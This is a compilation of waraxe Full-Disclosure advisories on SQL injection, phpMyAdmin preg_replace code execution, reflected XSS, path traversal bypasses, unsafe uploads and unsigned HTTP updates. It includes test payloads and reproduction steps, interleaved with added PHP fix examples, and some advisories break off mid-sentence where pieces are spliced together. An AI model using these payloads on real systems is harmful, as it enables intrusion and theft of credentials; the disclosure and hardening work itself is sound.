[Full-disclosure] [waraxe-2013-SA#104] - Multiple Vulnerabilities in Spider Event Calendar Wordpress Plugin
[waraxe-2013-SA#104] - Multiple Vulnerabilities in Spider Event Calendar Wordpress Plugin
===

Author: Janek Vind "waraxe"
Date: 22. May 2013
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-104.html

Description of vulnerable software:
~~~
Spider Event Calendar is a highly configurable plugin which allows you to have multiple organized events in a calendar. This plugin is one of the best WordPress Calendars available in the WordPress Directory. If you have problems with organizing your WordPress Calendar events and displaying them in a calendar format, then Spider WordPress Calendar Plugin is the best solution.

http://wordpress.org/extend/plugins/spider-event-calendar/
http://web-dorado.com/products/wordpress-calendar.html

Vulnerable is current version 1.3.0, older versions not tested.

### 1. Insufficient access check for AJAX operations in "calendar.php" ###

Reason:
1. weak access control implementation

Preconditions:
1. must be logged in as Wordpress user

Impact:
1. Any Wordpress user can edit Spider Calendar

Php script "calendar.php" line 197:

[ source code start ]--
add_action('wp_ajax_spidercalendarinlineedit', 'spider_calendar_quick_edit');
add_action('wp_ajax_spidercalendarinlineupdate', 'spider_calendar_quick_update');

function spider_calendar_quick_update(){
    global $wpdb;
    if(isset($_POST['calendar_id']) && isset($_POST['calendar_title']) && isset($_POST['us_12_format_sp_calendar'])){
        $wpdb->update(
...
function spider_calendar_quick_edit(){
    global $wpdb;
    if(isset($_POST['calendar_id'])){
        $row=$wpdb->get_row(
[ source code end ]

We can see that AJAX actions "wp_ajax_spidercalendarinlineedit" and "wp_ajax_spidercalendarinlineupdate" are bound to functions "spider_calendar_quick_edit" and "spider_calendar_quick_update". These two functions are meant to be used only by admin, but there is nothing to stop low-privileged users. Even users with "Subscriber" access level can use those two AJAX functions.

Test:

[ HTML test form; input fields lost in extraction. POSTs to: ]
http://localhost/wp351/wp-admin/admin-ajax.php?action=spidercalendarinlineedit

Result: calendar editing form will be shown

Remark: This weakness in access control makes the next two SQL injection vulnerabilities much more critical - there is no need for admin privileges, even a low-level Wordpress user is able to exploit these vulnerabilities.

### 2. SQL Injection in "calendar.php" function "spider_calendar_quick_update" ###

Reason:
1. insufficient sanitization of user-supplied data

Attack vector:
1. user-supplied POST parameter "calendar_id"

Preconditions:
1. must be logged in as Wordpress user

Php script "calendar.php" line 199:

[ source code start ]--
add_action('wp_ajax_spidercalendarinlineupdate', 'spider_calendar_quick_update');

function spider_calendar_quick_update(){
    global $wpdb;
    if(isset($_POST['calendar_id']) && isset($_POST['calendar_title']) && isset($_POST['us_12_format_sp_calendar'])){
...
        $row=$wpdb->get_row("SELECT * FROM ".$wpdb->prefix."spidercalendar_calendar WHERE id=".$_POST['calendar_id']);
[ source code end ]

As seen above, user-supplied POST parameter "calendar_id" is used in the SQL query without any sanitization, resulting in an SQL injection vulnerability.

Test:

[ HTML test form; input fields lost in extraction. POSTs to: ]
http://localhost/wp351/wp-admin/admin-ajax.php?action=spidercalendarinlineupdate

Result: in case of success, sensitive information about Wordpress user with ID 1 will be revealed: username, password hash and email.

### 3. SQL Injection in "calendar.php" function "spider_calendar_quick_edit" ###

Reason:
1. insufficient sanitization of user-supplied data

Attack vector:
1. user-supplied POST parameter "calendar_id"

Precondi
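An added example (not the plugin's code) of how the two AJAX handlers from this advisory look with the missing controls in place: an administrator capability check, a nonce check, and the id bound through $wpdb->prepare() instead of concatenated. The nonce action name and the two column names in the update() call are assumptions, because the advisory's excerpt stops before them.

```php
<?php
// Added example, not Spider Event Calendar code. Handler names and the table
// name come from the advisory; 'spidercalendar_inline' (nonce action) and the
// 'title' / 'time_format' columns are assumptions.

add_action('wp_ajax_spidercalendarinlineedit',   'hardened_calendar_quick_edit');
add_action('wp_ajax_spidercalendarinlineupdate', 'hardened_calendar_quick_update');

/**
 * Shared gate for both handlers. Being logged in is not a privilege: the caller
 * must hold a capability only administrators have, and the request must carry
 * the nonce issued with the edit form. Either failure ends the request.
 */
function hardened_calendar_gate() {
    if (!current_user_can('manage_options')) {
        wp_send_json_error('insufficient privileges', 403);
    }
    check_ajax_referer('spidercalendar_inline', 'nonce');
}

function hardened_calendar_quick_edit() {
    global $wpdb;
    hardened_calendar_gate();
    if (!isset($_POST['calendar_id'])) {
        wp_send_json_error('missing calendar_id', 400);
    }
    // Cast to int and bind with %d: the id can no longer change the query text.
    $id  = (int) $_POST['calendar_id'];
    $row = $wpdb->get_row($wpdb->prepare(
        "SELECT * FROM {$wpdb->prefix}spidercalendar_calendar WHERE id = %d",
        $id
    ));
    if ($row === null) {
        wp_send_json_error('no such calendar', 404);
    }
    wp_send_json_success($row);
}

function hardened_calendar_quick_update() {
    global $wpdb;
    hardened_calendar_gate();
    if (!isset($_POST['calendar_id'], $_POST['calendar_title'], $_POST['us_12_format_sp_calendar'])) {
        wp_send_json_error('missing parameters', 400);
    }
    $id = (int) $_POST['calendar_id'];
    // update() builds SET and WHERE from arrays with explicit %s/%d formats,
    // so neither the title nor the id is spliced into SQL by hand.
    $updated = $wpdb->update(
        $wpdb->prefix . 'spidercalendar_calendar',
        array(
            'title'       => sanitize_text_field(wp_unslash($_POST['calendar_title'])),
            'time_format' => (int) $_POST['us_12_format_sp_calendar'],
        ),
        array('id' => $id),
        array('%s', '%d'),
        array('%d')
    );
    if ($updated === false) {
        wp_send_json_error('database error', 500);
    }
    wp_send_json_success(array('id' => $id, 'rows' => $updated));
}
```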
[Full-disclosure] [waraxe-2013-SA#103] - Multiple Vulnerabilities in phpMyAdmin
[waraxe-2013-SA#103] - Multiple Vulnerabilities in phpMyAdmin
===

Author: Janek Vind "waraxe"
Date: 25. April 2013
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-103.html

Description of vulnerable software:
~~~
phpMyAdmin is a free software tool written in PHP, intended to handle the administration of MySQL over the World Wide Web. phpMyAdmin supports a wide range of operations with MySQL.

http://www.phpmyadmin.net/home_page/index.php

### 1. Remote code execution via preg_replace() in "libraries/mult_submits.inc.php" ###

Reason:
1. insufficient sanitization of user data before using in preg_replace

Attack vectors:
1. user-supplied parameters "from_prefix" and "to_prefix"

Preconditions:
1. logged in as valid PMA user
2. PHP version < 5.4.7 (Newer versions: Warning: preg_replace(): Null byte in regex)

PMA security advisory: PMASA-2013-2
CVE id: CVE-2013-3238
Affected phpMyAdmin versions: 3.5.8 and 4.0.0-RC2

Result: PMA user is able to execute arbitrary PHP code on webserver

Let's take a look at the source code:

Php script "libraries/mult_submits.inc.php" line 426 (PMA version 3.5.8):

[ source code start ]--
case 'replace_prefix_tbl':
    $current = $selected[$i];
    $newtablename = preg_replace("/^" . $from_prefix . "/", $to_prefix, $current);
    $a_query = 'ALTER TABLE '
        . PMA_backquote($selected[$i])
        . ' RENAME '
        . PMA_backquote($newtablename) ; // CHANGE PREFIX PATTERN
    $run_parts = true;
    break;

case 'copy_tbl_change_prefix':
    $current = $selected[$i];
    $newtablename = preg_replace("/^" . $from_prefix . "/", $to_prefix, $current);
    $a_query = 'CREATE TABLE '
        . PMA_backquote($newtablename)
        . ' SELECT * FROM '
        . PMA_backquote($selected[$i]) ; // COPY TABLE AND CHANGE PREFIX PATTERN
    $run_parts = true;
    break;
[ source code end ]

We can see that PHP variables "$from_prefix" and "$to_prefix" are used in the preg_replace function without any sanitization. It appears that those variables are coming from a user-submitted POST request as parameters "from_prefix" and "to_prefix".

It is possible to inject the e-modifier with a terminating null byte via the first parameter and php code via the second parameter. In case of successful exploitation the injected PHP code will be executed on the PMA webserver.

Tests:

1. Log in to PMA and select database:
http://localhost/PMA/index.php?db=test&token=25a6ce9e288070bd28c3f9aebffad1b8
2. Select one table from the database by using the checkbox and then select "Replace table prefix" from the select control "With selected:".
3. We can see a form named "Replace table prefix:" with two input fields. Type "/e%00" into the "From" field and "phpinfo()" into the "To" field.
4. Activate the Tamper Data Firefox add-on:
https://addons.mozilla.org/en-us/firefox/addon/tamper-data/
5. Click "Submit", Tamper Data pops up, choose "Tamper".
6. Now we can modify the POST request. Look for parameter "from_prefix". It should be "%2Fe%2500", remove "25", so that it becomes "%2Fe%00". Click "OK" and Firefox will send out the manipulated POST request.
7. We are greeted by phpinfo function output - code execution is confirmed.

PMA version 4.0.0-RC2 contains an almost identical vulnerability:

Php script "libraries/mult_submits.inc.php" line 482 (PMA version 4.0.0-RC2):

[ source code start ]--
case 'replace_prefix_tbl':
    $current = $selected[$i];
    $newtablename = preg_replace("/^" . $_POST['from_prefix'] . "/", $_POST['to_prefix'], $current);
    $a_query = 'ALTER TABLE '
        . PMA_Util::backquote($selected[$i])
        . ' RENAME '
        . PMA_Util::backquote($newtablename); // CHANGE PREFIX PATTERN
    $run_parts = true;
    break;

case 'copy_tbl_change_prefix':
    $current = $selected[$i];
    $newtablename = preg_replace("/^" . $_POST['from_prefix'] . "/", $_POST['to_prefix'], $current);
    $a_query = 'CREATE TABLE '
        . PMA_Util::backquote($newtablename)
        . ' SELECT * FROM '
        . PMA_Util::backquote($selected[$i]); // COPY TABLE AND CHANGE PREFIX PATTERN
    $run_parts = true;
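An added example, not phpMyAdmin code, showing the prefix replacement from the quoted code beside two safe forms: preg_quote() with the delimiter argument, which stops user input from closing the pattern or appending modifiers, and a plain string comparison that needs no regex at all. The table and prefix values are constructed.

```php
<?php
// Added example, not phpMyAdmin's code. Inputs below are constructed.

/** The shape quoted in the advisory: $from is spliced into the pattern itself. */
function replace_prefix_unsafe($table, $from, $to) {
    return preg_replace("/^" . $from . "/", $to, $table);
}

/**
 * Fix 1: keep preg_replace, but preg_quote() escapes every regex metacharacter
 * and the "/" delimiter, so the input can neither close the pattern nor add
 * modifiers after it. A NUL byte is never a legitimate prefix, so reject it
 * instead of relying on the engine's handling of it.
 */
function replace_prefix_quoted($table, $from, $to) {
    if (strpos($from, "\0") !== false || strpos($to, "\0") !== false) {
        throw new InvalidArgumentException('NUL byte in prefix');
    }
    return preg_replace('/^' . preg_quote($from, '/') . '/', $to, $table);
}

/** Fix 2: a prefix test is plain string work; no regex, nothing to inject into. */
function replace_prefix_plain($table, $from, $to) {
    if ($from !== '' && strncmp($table, $from, strlen($from)) === 0) {
        return $to . substr($table, strlen($from));
    }
    return $table;
}

// A normal rename and a prefix built like the advisory's ("/e" then a NUL).
$benign  = 'old_';
$hostile = "/e\0";
foreach (array('replace_prefix_quoted', 'replace_prefix_plain') as $fn) {
    echo $fn, ': ', $fn('old_users', $benign, 'new_'), "\n";   // new_users
    try {
        echo $fn, ': ', var_export($fn('old_users', $hostile, 'phpinfo()'), true), "\n";
    } catch (InvalidArgumentException $e) {
        echo $fn, ': rejected (', $e->getMessage(), ")\n";
    }
}
```

With the quoted form the hostile prefix is rejected before preg_replace() runs; with the plain form it is simply a prefix that does not match and the table name comes back unchanged.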
[Full-disclosure] [waraxe-2013-SA#102] - Reflected XSS in phpMyAdmin 3.5.7
[waraxe-2013-SA#102] - Reflected XSS in phpMyAdmin 3.5.7
===

Author: Janek Vind "waraxe"
Date: 09. April 2013
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-102.html

Description of vulnerable software:
~~~
phpMyAdmin is a free software tool written in PHP, intended to handle the administration of MySQL over the World Wide Web. phpMyAdmin supports a wide range of operations with MySQL.

http://www.phpmyadmin.net/home_page/index.php

Affected are versions 3.5.0 to 3.5.7, older versions not vulnerable.

### 1. Reflected XSS in "tbl_gis_visualization.php" ###

Reason:
1. insufficient sanitization of html output

Attack vectors:
1. user-supplied parameters "visualizationSettings[width]" and "visualizationSettings[height]"

Preconditions:
1. valid session
2. "token" parameter must be known
3. valid database name must be known

Php script "tbl_gis_visualization.php" line 51:

[ source code start ]--
// Get settings if any posted
$visualizationSettings = array();
if (PMA_isValid($_REQUEST['visualizationSettings'], 'array')) {
    $visualizationSettings = $_REQUEST['visualizationSettings'];
...
[ source code end ]

Tests (parameters "db" and "token" must be valid):

http://localhost/PMA/tbl_gis_visualization.php?db=information_schema&token=17961b7ab247b6d2b39d730bf336cebb&visualizationSettings[width]=">alert(123);

http://localhost/PMA/tbl_gis_visualization.php?db=information_schema&token=17961b7ab247b6d2b39d730bf336cebb&visualizationSettings[height]=">alert(123);

Result: javascript alert box pops up, confirming the Reflected XSS vulnerability.
Disclosure timeline:
~~~
31.03.2013 -> Sent email to developers
31.03.2013 -> First response email from developers
02.04.2013 -> Second email from developers - XSS patched in Git repository
03.04.2013 -> phpMyAdmin 3.5.8-rc1 is released
08.04.2013 -> phpMyAdmin 3.5.8 is released
09.04.2013 -> public advisory released

Contact:
~~~
come2war...@yahoo.com
Janek Vind "waraxe"
Waraxe forum: http://www.waraxe.us/forums.html
Personal homepage: http://www.janekvind.com/
Random project: http://albumnow.com/
-- [ EOF ]

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [waraxe-2013-SA#101] - Update Spoofing Vulnerability in Royal TS 2.1
[waraxe-2013-SA#101] - Update Spoofing Vulnerability in Royal TS 2.1.5
===

Author: Janek Vind "waraxe"
Date: 29. March 2013
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-101.html

Description of vulnerable software:
~~~
Royal TS is a simple, yet powerful tool for administrators, developers, system engineers and many other IT-focused information workers that supports them in working effortlessly with their remote systems or management consoles.

http://www.royalts.com/main/home/win.aspx

Vulnerable is version 2.1.5, other versions not tested.

### 1. Update Spoofing Vulnerability ###

The current version of Royal TS contains a security vulnerability in the update mechanism, which can be exploited by malicious people to conduct spoofing attacks. When checking for updates, Royal TS issues a GET request over HTTP:

GET /dl/RoyalTS/VersionInfo.xml?r=9:54:35%20PM HTTP/1.1
Cache-Control: no-cache
Host: www.royalts.com
Connection: Keep-Alive

Server response:

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Fri, 16 Nov 2012 11:13:01 GMT
Accept-Ranges: bytes
ETag: "d11e6057ebc3cd1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Thu, 28 Mar 2013 19:54:39 GMT
Content-Length: 13375

[ XML body; element markup lost in extraction, surviving values: ]
"http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
2 1 5 61116
http://www.royalts.com/dl/RoyalTS/RoyalTSInstaller_2.01.05.61116.msi
<html lang="en" xmlns="http://www.w3.org/1999/xhtml"> ...

Royal TS user can click the "Start Download" button and Royal TS will open a web browser with a download-starting dialog.

Such an update mechanism contains a security flaw: the update check is done over an unencrypted HTTP channel. A malicious third party is able to conduct Man-in-the-Middle (MitM) attacks and spoof the server response. In this way it is possible to instruct the user to download a malicious update.

Testing: tests were done using Windows 7 and Apache webserver.

Steps:

1. modify "windows/system32/drivers/etc/hosts" file in order to emulate DNS spoofing:
127.0.0.1 www.royalts.com
2. create xml file "/dl/RoyalTS/VersionInfo.xml" in the webserver directory with the following content:

[ XML body; element markup lost in extraction, surviving values: ]
"http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
2 3 4 61116
http://localhost/calc.exe
New version 2.3.4 available!

3. Place "calc.exe" file in the webserver main directory.
4. Open Royal TS, it will check for updates automatically, resulting in dialog:
New version 2.3.4 available!
5. Press the "Start Download" button. The default web browser window will open, offering file download:
"You have chosen to open calc.exe"

-- [ EOF ]
[Full-disclosure] [waraxe-2013-SA#100] - Update Spoofing Vulnerability in mRemote 1.50
[waraxe-2013-SA#100] - Update Spoofing Vulnerability in mRemote 1.50
===

Author: Janek Vind "waraxe"
Date: 29. March 2013
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-100.html

Description of vulnerable software:
~~~
mRemote is a software solution that will allow you to manage all your remote control connections in a single place. Currently it supports the RDP, VNC, SSH2 and Telnet protocols.

http://www.royalts.com/main/home/mRemote.aspx
http://mremote-portable.softpile.com/58492/download/

Vulnerable is version 1.50, other versions not tested.

### 1. Update Spoofing Vulnerability ###

The current version of mRemote contains a security vulnerability in the update mechanism, which can be exploited by malicious people to conduct spoofing attacks. When checking for updates, mRemote issues a GET request over HTTP:

GET /mRemote_Update.txt HTTP/1.1
Host: update.mremote.org
Connection: Keep-Alive

Server response:

HTTP/1.1 200 OK
Content-Length: 284
Content-Type: text/plain
Last-Modified: Wed, 22 Apr 2009 18:29:48 GMT
Accept-Ranges: bytes
ETag: "16cc425178c3c91:1e75"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 28 Mar 2013 14:03:07 GMT

Version: 1.50
dURL: http://www.mremote.org/wiki/GetFile.aspx?File=Downloads/mRemote_1.50_Setup.exe
clURL: http://update.mRemote.org/mRemote_1.50_ChangeLog.txt
imgURL: http://update.mRemote.org/banners/Banner_vRD09.png
imgURLLink: http://www.visionapp.com/vRD2009-highlights.html

mRemote user can click the "Download and Install" button and mRemote will download and install the update.

Such an update mechanism contains two security flaws:

1. The update check is done over an unencrypted HTTP channel. A malicious third party is able to conduct Man-in-the-Middle (MitM) attacks and spoof the server response. In this way it is possible to instruct mRemote to download a malicious update.
2. mRemote will execute the downloaded update without digital signature verification.

Testing: tests were done using Windows 7 and Apache webserver.

Steps:

1. modify "windows/system32/drivers/etc/hosts" file in order to emulate DNS spoofing:
127.0.0.1 update.mremote.org
2. create text file "mRemote_Update.txt" in the webserver main directory with the following content:

Version: 1.51
dURL: http://localhost/calc.exe
clURL: http://localhost/mRemote_1.51_ChangeLog.txt
imgURL: http://update.mRemote.org/banners/Banner_vRD09.png
imgURLLink: http://www.visionapp.com/vRD2009-highlights.html

3. create text file "mRemote_1.51_ChangeLog.txt" in the webserver main directory with the following content:
New version 1.51 available!
4. Place "calc_EN.exe" file in the webserver main directory.
5. Open mRemote, it will check for updates automatically. Response:
New version 1.51 available!
6. Press the "Download and Install" button. Successful download ends with response:
Download complete! mRemote will now quit and begin with the installation.
7. Press the "OK" button and the downloaded exe file will be executed.

-- [ EOF ]
[Full-disclosure] [waraxe-2013-SA#099] - Update Spoofing Vulnerability in LibreOffice 4.0.1.2
[waraxe-2013-SA#099] - Update Spoofing Vulnerability in LibreOffice 4.0.1.2
===

Author: Janek Vind "waraxe"
Date: 21. March 2013
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-99.html

Description of vulnerable software:
~~~
LibreOffice is a free and open source office suite, developed by The Document Foundation. It is descended from OpenOffice.org, from which it was forked in 2010. The LibreOffice suite includes a word processor, spreadsheet, graphics editor, slideshow creator, database and math formula writer.

http://www.libreoffice.org/

Affected are versions 3.5.1 to newest 4.0.1.2, older versions were not tested.

### 1. Update Spoofing Vulnerability ###

It appears that the current version of LibreOffice contains a security vulnerability in the update mechanism, which can be exploited by malicious people to conduct spoofing attacks. When checking for updates, LibreOffice issues a GET request over HTTP:

GET /check.php HTTP/1.1
Connection: TE, close
TE: trailers
Host: update.libreoffice.org
Accept-Encoding: gzip
Pragma: no-cache
Accept-Language: en-US
User-Agent: LibreOffice 4.0.0.3 (7545bee9c2a0782548772a21bc84a9dcc583b89; Windows; x86; BundledLanguages=en-US af am ar as ast be bg bn bn-IN bo ...)

Server at "update.libreoffice.org" responds with XML data:

[ XML body; element markup lost in extraction, surviving values: ]
"http://update.libreoffice.org/description"
LibreOffice 4.0.1
84102822e3d61eb989ddd325abf1ac077904985
Windows x86
4.0.1
http://www.libreoffice.org/download/

LibreOffice user can click the "Download" and "Install" buttons and LibreOffice will download and install the update.

Such an update mechanism contains two security flaws:

1. The update check is done over an unencrypted HTTP channel. A malicious third party is able to conduct Man-in-the-Middle (MitM) attacks and spoof the server response. In this way it is possible to instruct LibreOffice to download a malicious update.
2. LibreOffice will execute the downloaded update without digital signature verification.

Testing: tests were done using Windows 7, Apache and PHP.

Steps:

1. modify "windows/system32/drivers/etc/hosts" file in order to emulate DNS spoofing:
127.0.0.1 update.libreoffice.org
2. create php file "check.php" in the webserver main directory:

[ PHP script echoing an XML body; markup lost in extraction, surviving values: ]
"http://update.libreoffice.org/description"
LibreOffice 5.6.7
123456789
Windows x86
5.6.7
http://localhost/notepad.exe
'; ?>

3. Place "notepad.exe" file in the webserver main directory.
4. Open LibreOffice Writer -> Help -> Check For Updates. Response:
LibreOffice 5.6.7 is available.
5. Press the "Download" button. Successful download ends with response:
Download of LibreOffice 5.6.7 completed. Ready for installation.
6. Press the "Install" button, choose "Yes" and after that Notepad will be opened.

-- [ EOF ]
[Full-disclosure] [waraxe-2013-SA#098] - Directory Traversal Vulnerabilities in OpenCart 1.5.5.1
[waraxe-2013-SA#098] - Directory Traversal Vulnerabilities in OpenCart 1.5.5.1
===

Author: Janek Vind "waraxe"
Date: 19. March 2013
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-98.html

Description of vulnerable software:
~~~
OpenCart is a turn-key ready "out of the box" shopping cart solution. You simply install, select your template, add products and you're ready to start accepting orders.

http://www.opencart.com/

Affected are all OpenCart versions, from 1.4.7 to 1.5.5.1, maybe older too.

### 1. Directory Traversal Vulnerabilities in "filemanager.php" ###

Reason: insufficient sanitization of user-supplied data

Attack vectors:
1. user-supplied POST parameters "directory", "name", "path", "from", "to"

Preconditions:
1. Logged in as admin with filemanager access privileges

Script "filemanager.php" offers OpenCart admins various file-related services: directory listing and creation, image file listing, file copy/move/unlink, upload, image resize. By design an OpenCart admin can manage files and directories only inside the specific subdirectory "image/data/". It means that even if you have OpenCart admin privileges, you still are not supposed to get access to the files and directories below "image/data/". So far, so good. But what about directory traversal? Let's have a look at the source code.

PHP script "admin/controller/common/filemanager.php" line 66:

[ source code start ]--
public function directory() {
    $json = array();

    if (isset($this->request->post['directory'])) {
        $directories = glob(rtrim(DIR_IMAGE . 'data/' . str_replace('../', '', $this->request->post['directory']), '/') . '/*', GLOB_ONLYDIR);

        if ($directories) {
            $i = 0;

            foreach ($directories as $directory) {
                $json[$i]['data'] = basename($directory);
                $json[$i]['attributes']['directory'] = utf8_substr($directory, strlen(DIR_IMAGE . 'data/'));
...
    $this->response->setOutput(json_encode($json));
[ source code end ]

We can see that directory traversal is prevented by removing "../" substrings from user-submitted parameters. At first look this seems to be secure enough - if we can't use "../", then directory traversal is impossible, right? Deeper analysis shows a couple of shortcomings in this specific filtering method.

First problem - if OpenCart is hosted on a Windows platform, then it's possible to use the "..\" substring for directory traversal.

Test (parameter "token" must be valid):

-[ test code start ]---
[ HTML test form; input fields lost in extraction. POSTs to: ]
http://localhost/oc1551/admin/index.php?route=common/filemanager/directory&token=92aa6ac32b4c8e7a175c3dc9f7754d25
--[ test code end ]

Server response is in JSON format and contains a listing of subdirectories outside of the OpenCart main directory.

Second problem - filtering with "str_replace" can be tricked by using custom strings. If we use the "..././" substring, then after filtering it becomes "../". So it appears that the implemented anti-traversal code is ineffective and can be bypassed.

Test (parameter "token" must be valid):

-[ test code start ]---
[ HTML test form; input fields lost in extraction. POSTs to: ]
http://localhost/oc1551/admin/index.php?route=common/filemanager/directory&token=92aa6ac32b4c8e7a175c3dc9f7754d25
--[ test code end ]

Server response is exactly the same as in the previous test - information about the directory structure outside of the OpenCart main directory has been disclosed.

PHP script "filemanager.php" contains 14 uses of "str_replace('../', ''," code. Most of the public functions in "filemanager.php" are affected by the directory traversal vulnerability:

public function directory() -> listing of subdirectories
public function files() -> listing of image files
public function create() -> creation of new directories
public function delete() -> deletion of arbitrary files and directorie
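An added example, not OpenCart code, contrasting the str_replace('../', '') filter quoted above with a containment check: resolve the requested directory with realpath() and accept it only if the canonical path stays under image/data. The base directory and the small directory tree are constructed so the script runs stand-alone.

```php
<?php
// Added example, not OpenCart's code. DIR_IMAGE and the directory tree are
// constructed here; in OpenCart DIR_IMAGE comes from the admin config.
define('DIR_IMAGE', sys_get_temp_dir() . '/oc_demo/image/');

/** The filter as quoted in the advisory, kept only for comparison. */
function traversal_filter_unsafe($dir) {
    return str_replace('../', '', $dir);
}

/**
 * Resolve the request against image/data and accept it only if the canonical
 * path is that directory or lies strictly below it. realpath() collapses "..",
 * backslashes on Windows and symlinks, so the result, not the request string,
 * is what gets checked; tricks that rebuild "../" out of the filter's own
 * output have nothing to rebuild. Returns the canonical path or null.
 */
function resolve_image_dir($requested) {
    $base = realpath(DIR_IMAGE . 'data');
    $real = realpath(DIR_IMAGE . 'data/' . $requested);
    if ($base === false || $real === false) {
        return null;                 // base missing, or target does not exist
    }
    // Compare with a trailing separator so "data_old" is not taken for "data".
    $prefix = $base . DIRECTORY_SEPARATOR;
    if ($real === $base || strncmp($real . DIRECTORY_SEPARATOR, $prefix, strlen($prefix)) === 0) {
        return $real;
    }
    return null;
}

// Constructed tree: one legitimate subdirectory and one sibling that must stay hidden.
@mkdir(DIR_IMAGE . 'data/catalog', 0700, true);
@mkdir(DIR_IMAGE . 'secret', 0700, true);

$cases = array('catalog', '..././secret', '..\\secret', '../secret');
foreach ($cases as $c) {
    printf("%-14s filter -> %-10s realpath check -> %s\n",
        $c,
        traversal_filter_unsafe($c),
        resolve_image_dir($c) === null ? 'REJECTED' : 'allowed');
}
```

The output shows the filter turning "..././secret" into "../secret" while the realpath check rejects every case except "catalog".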
[Full-disclosure] [waraxe-2012-SA#096] - Multiple Vulnerabilities in Zenphoto 1.4.3.3
[waraxe-2012-SA#096] - Multiple Vulnerabilities in Zenphoto 1.4.3.3
===

Author: Janek Vind "waraxe"
Date: 03. November 2012
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-96.html

Description of vulnerable software:
~~~
Zenphoto is a standalone CMS for multimedia focused websites. Our focus lies on being easy to use and having all the features there when you need them (but out of the way if you do not.) Zenphoto features support for images, video and audio formats, and the Zenpage CMS plugin provides a fully integrated news section (blog) and custom pages to run entire websites.

http://www.zenphoto.org/
https://code.google.com/p/zenphoto/

Affected versions: Zenphoto 1.4.3.3 and older
Patched version: Zenphoto 1.4.3.4

### 1. SQL Injection in "zp-core/zp-extensions/failed_access_blocker.php" ###

Reason: insufficient sanitization of user-supplied data

Attack vector: user-supplied HTTP header "X_FORWARDED_FOR"

Preconditions:
1. plugin "failed_access_blocker" activated (disabled by default)

The "failed_access_blocker" plugin will log every failed authentication attempt:

Php script "zp-core/zp-extensions/failed_access_blocker.php" line 75:

[ source code start ]--
function failed_access_blocker_adminGate($allow, $page) {
...
    // add this attempt
    $sql = 'INSERT INTO '.prefix('plugin_storage').' (`type`, `aux`,`data`) VALUES ("failed_access", "'.time().'","'.getUserIP().'")';
    query($sql);
    // check how many times this has happened recently
    $count = db_count('plugin_storage','WHERE `type`="failed_access" AND `data`="'.getUserIP().'"');
[ source code end ]

The IP address of the user comes from function "getUserIP()" and is used in the SQL query. Let's look at the function "getUserIP()".

Php script "zp-core/functions.php" line 1979:

[ source code start ]--
function getUserIP() {
    if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
        return sanitize($_SERVER['HTTP_X_FORWARDED_FOR'], 0);
    } else {
        return sanitize($_SERVER['REMOTE_ADDR'], 0);
[ source code end ]

Function "sanitize()" does the following things to the input data:

1. strips slashes if magic_quotes_gpc=on
2. strips null bytes
3. strips html tags

So we can see that function "sanitize()" will prevent null byte tricks and most of the XSS exploits, but it does not escape or delete single and double quotes, therefore SQL Injection may still be possible. Actually this function makes SQL Injection more likely to occur because it reverts the effects of "magic_quotes_gpc". As a result of such insufficient input data sanitization, an attacker can use the HTTP header "X_FORWARDED_FOR" for SQL Injection.

Test:

Let's use the Firefox browser with the Tamper Data Add-on.

1. Open admin page:
http://localhost/zenphoto1433/zp-core/admin.php
2. Activate Tamper Data (Start Tamper)
3. Try to log in with bogus credentials, Tamper Data triggers
4. "Tamper with request?" -> "Tamper"
5. "Add element" -> X_FORWARDED_FOR=war"axe
6. Click "OK" and the tampered request will go to the server

As a result we will see a blank page (OK 200 response code, content length 0). But let's look at "debug.log" in "zp-data":

Backtrace: USER ERROR: MySql Error: ( INSERT INTO `[prefix]plugin_storage` (`type`, `aux`,`data`) VALUES ("failed_access", "1349792737","war"axe") ) failed. MySql returned the error You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'axe")'

### 2. SQL Injection in "zp-core/zp-extensions/search_statistics.php" ###

Reason: insufficient sanitization of user-supplied data

Attack vector: user-supplied HTTP header "X_FORWARDED_FOR"

Preconditions:
1. plugin "search_statistics" activated (disabled by default)

Php script "zp-core/zp-extensions/search_statistics.php" line 101:

[ source code start ]---
[Full-disclosure] [waraxe-2012-SA#095] - Multiple Vulnerabilities in Wordpress FoxyPress Plugin
[waraxe-2012-SA#095] - Multiple Vulnerabilities in Wordpress FoxyPress Plugin
===

Author: Janek Vind "waraxe"
Date: 30. October 2012
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-95.html

Description of vulnerable target:
~~~
FoxyPress is a FREE shopping cart and product management tool that integrates with FoxyCart's e-commerce solution to help you get your store up and running quickly and efficiently.

http://wordpress.org/extend/plugins/foxypress/

Affected version: 0.4.2.5

### 1. Arbitrary File Upload Vulnerability in "documenthandler.php" ###

Reasons: Missing security checks in file upload functionality

Attack vectors: Uploaded file

Preconditions: Logged in as admin with FoxyPress product editing privileges

Php script "documenthandler.php" line 14:

[ source code start ]--
if (!empty($_FILES)) {
...
    $targetpath = ABSPATH . INVENTORY_DOWNLOADABLE_LOCAL_DIR;
...
    $newfilename = foxypress_GenerateNewFileName($fileExtension, $inventory_id, $targetpath, $prefix);
    $targetpath = $targetpath . $newfilename;
    if(move_uploaded_file($_FILES['Filedata']['tmp_name'], $targetpath))
[ source code end ]

As we can see above, there are no security checks against the uploaded file. As a result, an attacker is able to upload files with arbitrary extension to the remote system. In case of php files this vulnerability leads to RCE (Remote Code Execution).

Test:

1. Open product editing webpage:
http://localhost/wp342/wp-admin/post.php?post=43&action=edit
2. Look for "Digital Downloads". Insert some number into the input box below "Max Downloads allowed (if you need to override the main setting)".
3. There must be a "Browse Files" button (Flash-based). Choose the php file you want to upload.

